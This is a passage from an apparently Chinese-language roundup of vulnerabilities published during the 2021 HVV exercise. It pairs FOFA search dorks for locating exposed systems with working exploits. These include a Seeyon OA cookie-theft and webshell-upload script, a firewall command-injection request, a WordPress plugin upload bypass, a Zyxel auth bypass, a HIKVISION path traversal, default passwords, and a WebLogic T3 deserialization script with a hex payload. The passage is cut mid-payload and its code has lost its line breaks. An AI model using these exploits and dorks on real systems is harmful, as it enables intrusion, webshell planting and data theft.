</jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry></map>

0x25 其他信息


4月10日9时,网爆OneBl**小于等于v2.2.1远程命令执行,poc已流出


CVE-2021-24086,Windows TCP/IP拒绝服务漏洞POC已公开

Chrome 命令执行(需要关闭Google沙箱,不排除存在绕过沙箱的可能) //https://www.cnblogs.com/KHZ521/p/14654233.html


4月11-4月12安全情报


0x26 浪潮 ClusterEngineV4.0 任意命令执行


漏洞关注点


/alarmConfig


fofa_dork


title="TSCEV4.0"


POC


地址 : https://github.com/xiaoshu-bit/ClusterEngineRce



pip3 install -r requirements.txtpython3 clusterengine_poc.py -u http://127.0.0.1:1111


def verify(self, first=False): target = self.scan_info['Target'] verbose = self.scan_info['Verbose'] headers = { "Content-Type": "application/x-www-form-urlencoded" } payload = "op=login&username=asd&password=asd'" try: url = urljoin(target, '/login') resp = req(url, 'post', data=payload,headers=headers,verify=False) if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text): log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution") self.scan_info['Success'] = True self.scan_info['Ret']['VerifyInfo']['URL'] = url self.scan_info['Ret']['VerifyInfo']['Payload'] = payload self.scan_info['Ret']['VerifyInfo']['method'] = "POST" return except Exception as e: log.info("[*]Request to target URL fail! {}".forma
t(e))


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x27 志远OA session泄露&&任意文件上传漏洞


漏洞描述


致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器


fofa


title="致远"


漏洞复现


首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的


POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: *


上传压缩包


POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: *


然后解压


POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: *


getshell 脚本



# coding: utf-8import requestsimport reimport timeproxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}def seeyon_new_rce(targeturl):    orgurl = targeturl    # 通过请求直接获取管理员权限cookie    targeturl = orgurl + 'seeyon/thirdpartyController.do'    post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}    response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)    rsp = ""    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():        cookies = response.cookies        cookies = requests.utils.dict_from_cookiejar(cookies)        # 上传压缩文件        aaa=cookies['JSESSIONID']        print(aaa)        targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'        files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]        print()        headers = {'Cookie':"JSESSIONID=%s"%aaa}        data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',                'isEncrypt': "0"}        response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)        if response.text:            reg = re.findall('fileurls=fileurls+","+'(.+)'',response.text,re.I)            print(reg)            if len(reg)==0:                exit("匹配失败")            fileid=reg[0]            targeturl = orgurl + 'seeyon/ajax.do'            datestr = time.strftime('%Y-%m-%d')            post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'            #headers = {'Cookie': cookies}            headers['Content-Type']="application/x-www-form-urlencoded"            response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)            print(response.text)seeyon_new_rce("https://baidu.com/")


shell地址:/seeyon/common/designer/pageLayout/a2345678.jsp


0x28 奇安信 网康下一代防火墙RCE


漏洞位置


/directdata/direct/router


POC



POST /directdata/direct/router HTTP/1.1Host: 192.168.10.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3AContent-Type: application/x-www-form-urlencodedContent-Length: 160
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x29 其他信息


4月12日14时 最新发现天擎终端安全管理系统控制台存在远程命令执行漏洞,poc疑似已流出
4月12日12时 最新发现讯雷11存在二进制漏洞
4月12日12时 传出PHP zerodiMQ后门漏洞,poc已流出
4月12日10时 传出fastjson 1.2.75 绕过RCE漏洞,poc疑似已流出


4月13号-4月21号


0x30 Create D-Link DCS系列监控账号密码信息泄露


fofa


app="D_Link-DCS-2530L"


POC


/config/getuser?index=0


0x31 HIKVISION 流媒体管理服务器 后台任意读取


Fofa


title="流媒体管理服务器"


POC


http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x32 HIKVISION 流媒体管理服务器 存在默认口令


POC


admin/12345


0x33 Kyan 网络监控设备 账号密码泄露漏洞


fofa


title="platform - Login"


POC


http:


0x34 Wayos AC集中管理系统默认口令


Fofa


title="AC集中管理系统"


POC


admin/admin


0x35 WordPress 插件SuperForms任意上传


影响版本


<= 4.9.X


POC

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 <=== exploit end pointHost: localhostUser-Agent: UserAgentAccept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------423513681827540048931513055996Content-Length: 7058Origin: localhostConnection: closeReferer: localhostCookie: 
-----------------------------423513681827540048931513055996Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======inject extension (|PHP4) to validate file to upload-----------------------------423513681827540048931513055996Content-Disposition: form-data; name="max_file_size"
8000000-----------------------------423513681827540048931513055996Content-Disposition: form-data; name="image_library"
0-----------------------------423513681827540048931513055996Content-Disposition: form-data; name="files[]";filename="filename.(extension)" <==== inject code extension (.php4)for exampleContent-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--

/wp-content/uploads/superforms/2021/01/<id>/filename.php4u can get <id> from server reply .


0x36 Zyxel NBG2105身份验证绕过

POC & EXP


import requestsimport sysfrom requests.packages.urllib3.exceptions import InsecureRequestWarning

def poc(url): exp = url + "/login_ok.htm"
header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cookie":"login=1", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=exp, headers=header, verify=False,timeout=10) if response.status_code == 200 and "GMT" in response.text: print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!") print("数据信息如下:") print(response.text) else: print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!") except Exception as e: print(exp + "请求失败!!")

def main(): url = str(input("请输入目标url:")) poc(url)

if __name__ == "__main__": main()


0x37 weblogic的T3反序列化RCE


POC



import socketimport osimport sysimport structimport timeif len(sys.argv) < 2:    print 'Usage: python %s <TARGET_HOST> <PORT>' % os.path.basename(sys.argv[0])    sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(5) server_address = (sys.argv[1], int(sys.argv[2]))print '[+] Connecting to %s port %s' % server_addresssock.connect(server_address) 
headers='t3 9.2.0.0nAS:255nHL:92nMS:10000000nPU:t3://abcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmn:7001nn'print 'sending "%s"' % headerssock.sendall(headers) data = sock.recv(1024)print >>sys.stderr, 'received "%s"' % data payloadObj='xacxedx00x05x73x72x00x17x6ax61x76x61x2ex75x74x69x6cx2ex4cx69x6ex6bx65x64x48x61x73x68x53x65x74xd8x6cxd7x5ax95xddx2ax1ex02x00x00x78x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x53x65x74xbax44x85x95x96xb8xb7x34x03x00x00x78x70x77x0cx00x00x00x10x3fx40x00x00x00x00x00x02x73x72x00x19x6ax61x76x61x2ex72x6dx69x2ex4dx61x72x73x68x61x6cx6cx65x64x4fx62x6ax65x63x74x7cxbdx1ex97xedx63xfcx3ex02x00x03x49x00x04x68x61x73x68x5bx00x08x6cx6fx63x42x79x74x65x73x74x00x02x5bx42x5bx00x08x6fx62x6ax42x79x74x65x73x71x00x7ex00x04x78x70xeax0cxa3xadx70x75x72x00x02x5bx42xacxf3x17xf8x06x08x54xe0x02x00x00x78x70x00x00x10xeaxacxedx00x05x73x72x00x17x6ax61x76x61x2ex75x74x69x6cx2ex4cx69x6ex6bx65x64x48x61x73x68x53x65x74xd8x6cxd7x5ax95xddx2ax1ex02x00x00x78x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x53x65x74xbax44x85x95x96xb8xb7x34x03x00x00x78x70x77x0cx00x00x00x10x3fx40x00x00x00x00x00x02x73x72x00x3ax63x6fx6dx2ex73x75x6ex2ex6fx72x67x2ex61x70x61x63x68x65x2ex78x61x6cx61x6ex2ex69x6ex74x65x72x6ex61x6cx2ex78x73x6cx74x63x2ex74x72x61x78x2ex54x65x6dx70x6cx61x74x65x73x49x6dx70x6cx09x57x4fxc1x6exacxabx33x03x00x08x49x00x0dx5fx69x6ex64x65x6ex74x4ex75x6dx62x65x72x49x00x0ex5fx74x72x61x6ex73x6cx65x74x49x6ex64x65x78x5ax00x15x5fx75x73x65x53x65x72x76x69x63x65x73x4dx65x63x68x61x6ex69x73x6dx4cx00x0bx5fx61x75x78x43x6cx61x73x73x65x73x74x00x3bx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx72x75x6ex74x69x6dx65x2fx48x61x73x68x74x61x62x6cx65x3bx5bx00x0ax5fx62x79x74x65x63x6fx64x65x73x74x00x03x5bx5bx42x5bx00x06x5fx63x6cx61x73x73x74x00x12x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx4cx00x05x5fx6ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x11x5fx6fx75x74x70x75x74x50x72x6fx70x65x72x74x69x65x73x74x00x16x4cx6ax61x76x61x2fx75x74x69x6cx2fx50x72x6fx70x65x72x74x69x65x73x3bx78x70x00x00x00x00xffxffxffxffx00x70x75x72x00x03x5bx5bx42x4bxfdx19x15x67x67xdbx37x02x00x00x78x70x00x00x00x01x75x72x00x02x5bx42xacxf3x17xf8x06x08x54xe0x02x00x00x78x70x00x00x0dx7axcaxfexbaxbex00x00x00x32x00xacx0ax00x26x00x5ax0ax00x5bx00x5cx0ax00x5bx00x5dx08x00x5ex0ax00x5fx00x60x08x00x61x07x00x62x0ax00x07x00x63x07x00x64x0ax00x65x00x66x09x00x67x00x68x0ax00x69x00x6ax08x00x6bx07x00x4dx0ax00x09x00x6cx08x00x6dx0ax00x07x00x6ex0ax00x6fx00x70x0ax00x6fx00x71x0ax00x07x00x72x08x00x73x07x00x74x0ax00x16x00x75x08x00x76x07x00x3dx08x00x77x07x00x78x08x00x79x0ax00x7ax00x7bx0ax00x1bx00x7cx0ax00x1bx00x7dx08x00x7ex0ax00x69x00x7fx0ax00x25x00x80x07x00x81x0ax00x23x00x82x07x00x83x07x00x84x01x00x06x3cx69x6ex69x74x3ex01x00x03x28x29x56x01x00x04x43x6fx64x65x01x00x0fx4cx69x6ex65x4ex75x6dx62x65x72x54x61x62x6cx65x01x00x12x4cx6fx63x61x6cx56x61x72x69x61x62x6cx65x54x61x62x6cx65x01x00x04x74x68x69x73x01x00x13x4cx73x75x70x65x72x6dx61x6ex2fx45x63x68x6fx54x65x73x74x3bx01x00x09x74x72x61x6ex73x66x6fx72x6dx01x00x72x28x4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx44x4fx4dx3bx5bx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx73x65x72x69x61x6cx69x7ax65x72x2fx53x65x72x69x61x6cx69x7ax61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx29x56x01x00x08x64x6fx63x75x6dx65x6ex74x01x00x2dx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx44x4fx4dx3bx01x00x08x68x61x6ex64x6cx65x72x73x01x00x42x5bx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx73x65x72x69x61x6cx69x7ax65x72x2fx53x65x72x69x61x6cx69x7ax61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx01x00x0ax45x78x63x65x70x74x69x6fx6ex73x07x00x85x01x00xa6x28x4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx44x4fx4dx3bx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx64x74x6dx2fx44x54x4dx41x78x69x73x49x74x65x72x61x74x6fx72x3bx4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx73x65x72x69x61x6cx69x7ax65x72x2fx53x65x72x69x61x6cx69x7ax61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx29x56x01x00x08x69x74x65x72x61x74x6fx72x01x00x35x4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx64x74x6dx2fx44x54x4dx41x78x69x73x49x74x65x72x61x74x6fx72x3bx01x00x07x68x61x6ex64x6cx65x72x01x00x41x4cx63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x6dx6cx2fx69x6ex74x65x72x6ex61x6cx2fx73x65x72x69x61x6cx69x7ax65x72x2fx53x65x72x69x61x6cx69x7ax61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx01x00x04x65x63x68x6fx01x00x03x62x75x66x01x00x02x5bx42x01x00x03x6fx75x74x01x00x16x4cx6ax61x76x61x2fx69x6fx2fx4fx75x74x70x75x74x53x74x72x65x61x6dx3bx01x00x01x73x01x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx01x00x01x66x01x00x19x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx46x69x65x6cx64x3bx01x00x01x6fx01x00x03x6cx65x6ex01x00x04x6cx65x6ex31x01x00x01x49x01x00x04x76x61x72x34x01x00x03x63x6cx73x01x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx01x00x03x6ex69x6fx01x00x02x73x73x01x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx01x00x04x76x61x72x36x01x00x04x76x61x72x35x01x00x0dx53x74x61x63x6bx4dx61x70x54x61x62x6cx65x07x00x62x07x00x64x01x00x08x3cx63x6cx69x6ex69x74x3ex01x00x04x76x61x72x33x01x00x15x4cx6ax61x76x61x2fx6cx61x6ex67x2fx45x78x63x65x70x74x69x6fx6ex3bx01x00x04x76x61x72x32x07x00x81x01x00x0ax53x6fx75x72x63x65x46x69x6cx65x01x00x22x45x63x68x6fx54x65x73x74x2ex6ax61x76x61x20x66x72x6fx6dx20x49x6ex70x75x74x46x69x6cx65x4fx62x6ax65x63x74x0cx00x27x00x28x07x00x86x0cx00x87x00x88x0cx00x89x00x8ax01x00x1bx77x65x62x6cx6fx67x69x63x2ex73x6fx63x6bx65x74x2ex53x6fx63x6bx65x74x4dx75x78x65x72x07x00x8bx0cx00x8cx00x8dx01x00x08x67x65x74x4dx75x78x65x72x01x00x0fx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x0cx00x8ex00x8fx01x00x10x6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x07x00x90x0cx00x91x00x92x07x00x93x0cx00x3ex00x94x07x00x95x0cx00x96x00x97x01x00x0ax67x65x74x53x6fx63x6bx65x74x73x0cx00x98x00x99x01x00x0ax63x6fx6ex6ex65x63x74x69x6fx6ex0cx00x9ax00x9bx07x00x9cx0cx00x9dx00x9ex0cx00x9fx00xa0x0cx00xa1x00x99x01x00x12x72x65x6dx6fx74x65x48x65x61x64x65x72x4cx65x6ex67x74x68x01x00x11x6ax61x76x61x2fx6cx61x6ex67x2fx49x6ex74x65x67x65x72x0cx00xa2x00xa3x01x00x09x67x65x74x42x75x66x66x65x72x01x00x0fx67x65x74x4fx75x74x70x75x74x53x74x72x65x61x6dx01x00x14x6ax61x76x61x2fx69x6fx2fx4fx75x74x70x75x74x53x74x72x65x61x6dx01x00x13x76x75x6cx6ex65x72x61x62x69x6cx69x74x79x20x65x78x69x73x74x07x00xa4x0cx00xa5x00xa6x0cx00xa7x00xa8x0cx00xa9x00x28x01x00x07x6fx6ex20x65x63x68x6fx0cx00x96x00xaax0cx00x3bx00x28x01x00x13x6ax61x76x61x2fx6cx61x6ex67x2fx45x78x63x65x70x74x69x6fx6ex0cx00xabx00x28x01x00x11x73x75x70x65x72x6dx61x6ex2fx45x63x68x6fx54x65x73x74x01x00x40x63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx72x75x6ex74x69x6dx65x2fx41x62x73x74x72x61x63x74x54x72x61x6ex73x6cx65x74x01x00x39x63x6fx6dx2fx73x75x6ex2fx6fx72x67x2fx61x70x61x63x68x65x2fx78x61x6cx61x6ex2fx69x6ex74x65x72x6ex61x6cx2fx78x73x6cx74x63x2fx54x72x61x6ex73x6cx65x74x45x78x63x65x70x74x69x6fx6ex01x00x10x6ax61x76x61x2fx6cx61x6ex67x2fx54x68x72x65x61x64x01x00x0dx63x75x72x72x65x6ex74x54x68x72x65x61x64x01x00x14x28x29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx54x68x72x65x61x64x3bx01x00x15x67x65x74x43x6fx6ex74x65x78x74x43x6cx61x73x73x4cx6fx61x64x65x72x01x00x19x28x29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x4cx6fx61x64x65x72x3bx01x00x15x6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x4cx6fx61x64x65x72x01x00x09x6cx6fx61x64x43x6cx61x73x73x01x00x25x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx01x00x09x67x65x74x4dx65x74x68x6fx64x01x00x40x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx4dx65x74x68x6fx64x3bx01x00x18x6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx4dx65x74x68x6fx64x01x00x06x69x6ex76x6fx6bx65x01x00x39x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx01x00x10x6ax61x76x61x2fx6cx61x6ex67x2fx53x79x73x74x65x6dx01x00x15x4cx6ax61x76x61x2fx69x6fx2fx50x72x69x6ex74x53x74x72x65x61x6dx3bx01x00x13x6ax61x76x61x2fx69x6fx2fx50x72x69x6ex74x53x74x72x65x61x6dx01x00x07x70x72x69x6ex74x6cx6ex01x00x15x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx29x56x01x00x08x67x65x74x43x6cx61x73x73x01x00x13x28x29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx01x00x10x67x65x74x44x65x63x6cx61x72x65x64x46x69x65x6cx64x01x00x2dx28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx46x69x65x6cx64x3bx01x00x17x6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx46x69x65x6cx64x01x00x0dx73x65x74x41x63x63x65x73x73x69x62x6cx65x01x00x04x28x5ax29x56x01x00x03x67x65x74x01x00x26x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx29x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx01x00x0dx67x65x74x53x75x70x65x72x63x6cx61x73x73x01x00x08x69x6ex74x56x61x6cx75x65x01x00x03x28x29x49x01x00x10x6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x01x00x08x67x65x74x42x79x74x65x73x01x00x04x28x29x5bx42x01x00x05x77x72x69x74x65x01x00x05x28x5bx42x29x56x01x00x05x66x6cx75x73x68x01x00x15x28x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx29x56x01x00x0fx70x72x69x6ex74x53x74x61x63x6bx54x72x61x63x65x00x21x00x25x00x26x00x00x00x00x00x05x00x01x00x27x00x28x00x01x00x29x00x00x00x33x00x01x00x01x00x00x00x05x2axb7x00x01xb1x00x00x00x02x00x2ax00x00x00x0ax00x02x00x00x00x22x00x04x00x23x00x2bx00x00x00x0cx00x01x00x00x00x05x00x2cx00x2dx00x00x00x01x00x2ex00x2fx00x02x00x29x00x00x00x3fx00x00x00x03x00x00x00x01xb1x00x00x00x02x00x2ax00x00x00x06x00x01x00x00x00x28x00x2bx00x00x00x20x00x03x00x00x00x01x00x2cx00x2dx00x00x00x00x00x01x00x30x00x31x00x01x00x00x00x01x00x32x00x33x00x02x00x34x00x00x00x04x00x01x00x35x00x01x00x2ex00x36x00x02x00x29x00x00x00x49x00x00x00x04x00x00x00x01xb1x00x00x00x02x00x2ax00x00x00x06x00x01x00x00x00x2dx00x2bx00x00x00x2ax00x04x00x00x00x01x00x2cx00x2dx00x00x00x00x00x01x00x30x00x31x00x01x00x00x00x01x00x37x00x38x00x02x00x00x00x01x00x39x00x3ax00x03x00x34x00x00x00x04x00x01x00x35x00x09x00x3bx00x28x00x02x00x29x00x00x02x0fx00x03x00x0dx00x00x00xf6xb8x00x02xb6x00x03x12x04xb6x00x05x4bx2ax12x06x03xbdx00x07xb6x00x08x01xc0x00x09x03xbdx00x09xb6x00x0ax4cxb2x00x0bx2bxb6x00x0cx2ax12x0dx03xbdx00x07xb6x00x08x2bx03xbdx00x09xb6x00x0axc0x00x0exc0x00x0ex4dxb2x00x0bx2cxb6x00x0cx2cx4ex2cxbex36x04x03x36x05x15x05x15x04xa2x00x9fx2dx15x05x32x3ax06x19x06xb6x00x0fx12x10xb6x00x11x3ax07x19x07x04xb6x00x12x19x07x19x06xb6x00x13x3ax08x19x08xb6x00x0fxb6x00x14x12x15xb6x00x11x3ax09x19x09x04xb6x00x12x19x09x19x08xb6x00x13xc0x00x16xb6x00x17x36x0ax15x0ax10x5cxa0x00x4dx19x06xb6x00x0fx12x18x03xbdx00x07xb6x00x08x19x06x03xbdx00x09xb6x00x0axc0x00x19xc0x00x19x3ax0bx19x06xb6x00x0fx12x1ax03xbdx00x07xb6x00x08x19x06x03xbdx00x09xb6x00x0axc0x00x1bx3ax0cx19x0cx12x1cxb6x00x1dxb6x00x1ex19x0cxb6x00x1fx84x05x01xa7xffx60xb1x00x00x00x03x00x2ax00x00x00x5ax00x16x00x00x00x30x00x0cx00x31x00x22x00x32x00x29x00x33x00x42x00x34x00x49x00x35x00x4bx00x36x00x4fx00x38x00x59x00x39x00x5fx00x3ax00x6bx00x3bx00x71x00x3cx00x7ax00x3dx00x89x00x3ex00x8fx00x3fx00x9ex00x40x00xa5x00x41x00xc4x00x42x00xe0x00x43x00xeax00x44x00xefx00x38x00xf5x00x47x00x2bx00x00x00x84x00x0dx00xc4x00x2bx00x3cx00x3dx00x0bx00xe0x00x0fx00x3ex00x3fx00x0cx00x5fx00x90x00x40x00x41x00x06x00x6bx00x84x00x42x00x43x00x07x00x7ax00x75x00x44x00x41x00x08x00x89x00x66x00x45x00x43x00x09x00x9ex00x51x00x46x00x47x00x0ax00x52x00xa3x00x48x00x47x00x05x00x0cx00xeax00x49x00x4ax00x00x00x22x00xd4x00x4bx00x41x00x01x00x42x00xb4x00x4cx00x4dx00x02x00x4bx00xabx00x4ex00x4dx00x03x00x4fx00xa7x00x4fx00x47x00x04x00x50x00x00x00x1dx00x03xffx00x52x00x06x07x00x51x07x00x52x07x00x0ex07x00x0ex01x01x00x00xfbx00x9cxfax00x05x00x34x00x00x00x04x00x01x00x23x00x08x00x53x00x28x00x01x00x29x00x00x00x77x00x02x00x01x00x00x00x16xb2x00x0bx12x20xb6x00x21xb8x00x22xa7x00x08x4bx2axb6x00x24x01x4bxb1x00x01x00x00x00x0bx00x0ex00x23x00x03x00x2ax00x00x00x1ex00x07x00x00x00x19x00x08x00x1ax00x0bx00x1dx00x0ex00x1bx00x0fx00x1cx00x13x00x1fx00x15x00x20x00x2bx00x00x00x16x00x02x00x0fx00x04x00x54x00x55x00x00x00x15x00x00x00x56x00x41x00x00x00x50x00x00x00x07x00x02x4ex07x00x57x04x00x01x00x58x00x00x00x02x00x59x70x74x00x04x50x77x6ex72x70x77x01x00x78x73x7dx00x00x00x01x00x1dx6ax61x76x61x78x2ex78x6dx6cx2ex74x72x61x6ex73x66x6fx72x6dx2ex54x65x6dx70x6cx61x74x65x73x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x74x00x08x66x35x61x35x61x36x30x38x71x00x7ex00x09x78x76x72x00x1dx6ax61x76x61x78x2ex78x6dx6cx2ex74x72x61x6ex73x66x6fx72x6dx2ex54x65x6dx70x6cx61x74x65x73x00x00x00x00x00x00x00x00x00x00x00x78x70x78x73x7dx00x00x00x01x00x14x6ax61x76x61x2ex69x6fx2e